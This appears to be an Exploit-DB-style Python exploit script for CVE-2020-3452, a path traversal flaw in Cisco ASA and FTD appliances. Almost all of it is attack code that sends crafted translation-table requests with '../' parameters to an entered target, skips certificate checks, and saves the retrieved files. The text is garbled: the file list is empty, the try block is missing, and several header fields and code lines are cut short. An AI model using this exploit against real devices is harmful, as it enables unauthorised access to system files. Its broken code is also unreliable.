# Exploit Title: Cisco ASA and FTD - Path Traversal (2)  
# Date: 12 Dec 2020  
# Exploit Author:  
# Vendor Homepage:  
# Software Link: It’s against Hardware, specifically ASA’s and FTD’s  
# Version: ASAs (from version 9.6 to and FTD’s (versions 6.2.3 to  
# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14  
# CVE : CVE-2020-3452  
# Github :  
import requests  
# Written by freakyclown for @CygentaHQ  
# Cisco ASA Path Traversal  
# CVE-2020-3452  
# Usage: {target}"  
# Example:"  
# Requires - Requests - pip3 install requests  
# This tool takes advantage of the above cve and attempts to  
# download files as listed below, it is suggested that you make  
# a working folder for the outputfiles to avoid confusion if  
# attacking mutliple ASA's  
# set your target  
target = input("Enter target IP/Url: ")  
def grabstuff():  
for file in files:  
print("trying: ", file)  
#set request parameters  
params = (  
('type', 'mst'),  
('textdomain', '+CSCOE+/'+file),  
('default-language', ''),  
('lang', '../'),  
# set the response to the result of the request, inputting in target and params and ignoring ssl cert problems  
response = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False)  
# write the file to the disk  
f = open(file,"w")  
# this is a list of files available to download, more will be added in time  
# if anyone has a list of ASA files, I'd be happy to add here  
files = {  
# obvious thing is obvious, try the things and barf if fail  
except Exception as err:  
print("Something went wrong sorry")